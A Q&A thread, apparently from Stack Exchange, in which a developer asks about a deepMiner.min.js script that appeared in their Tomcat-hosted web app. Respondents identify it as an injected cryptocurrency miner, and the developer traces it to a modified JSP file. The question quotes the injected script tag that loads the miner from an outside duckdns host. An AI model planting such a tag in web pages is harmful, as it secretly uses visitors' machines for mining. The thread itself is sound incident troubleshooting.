# what is deepminer.min.js that suddenly shows up in web app?

Tags: google-chrome, web, web-applications

what is deepMiner.min.js that suddenly shows up in web app? From chrome developer tools, it tried to load the file for 25 seconds, but failed.

```
https://jhondi33.duckdns.org:7777/deepMiner.min.js
```

The file is not explicitly included in web app.

For Microsoft Edge developer tools, it is always from cache even if cache is disabled.

### UPDATE

If running the webapp from my local machine, the file did not show up in Chrome developer tools. Is this related to web hosting? But the web app is HTTPS secure.

The following is inserted into the web page that is dynamically generated (not static)

```
<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
```

Answer (score 0):

it appears to be a cryptocurrency miner that can be obfuscated as something innocuous. This has been done by hijacking the webpage with injected entries. See [this similar issue in a Github issue.](https://github.com/KeyBridge/lib-openssrf/issues/16) Update the host and DNS auth.

[DeepMiner](https://github.com/deepwn/deepMiner)

Comment: Hi; could you be more specific? What webapp is it?

Comment: simple webapp using jquery. the file is from jhondi33.duckdns.org

Comment: Hi, it seems as though another website was hijacked with a script inserted, they updated their host and DNS auth.(with the same crypto mining minjs url) https://github.com/KeyBridge/lib-openssrf/issues/16

Comment: How could it be inserted into a page via HTTPS?

Comment: Hi, this seems to be good advice towards resolving this issue. https://www.getastra.com/blog/911/remove-crypto-mining-malware-cms-wordpress-magento-drupal/#Preventing-Crypto-mining-malware-hack

Comment: Thanks. The advice is for static html page. But the web page is dynamically generated and connection is HTTPS. Do not understand how it could happen.

Comment: are you using the latest jquery?

Comment: Found out a JSP file was modified by the virus. The web app is deployed on Tomcat on Ubuntu. How was the virus getting into the Ubuntu system? All js (incl. jquery) are from their official sites. Thanks.

Comment: How does the virus works? How to prevent it from happening again? Thanks.

Comment: Hi; it runs javascript miners with ~65% of the performance of a normal miner, I would just say to check the sources and your file integrity frequently.

Comment: Where is the miner coming from? Is it virus? Thanks,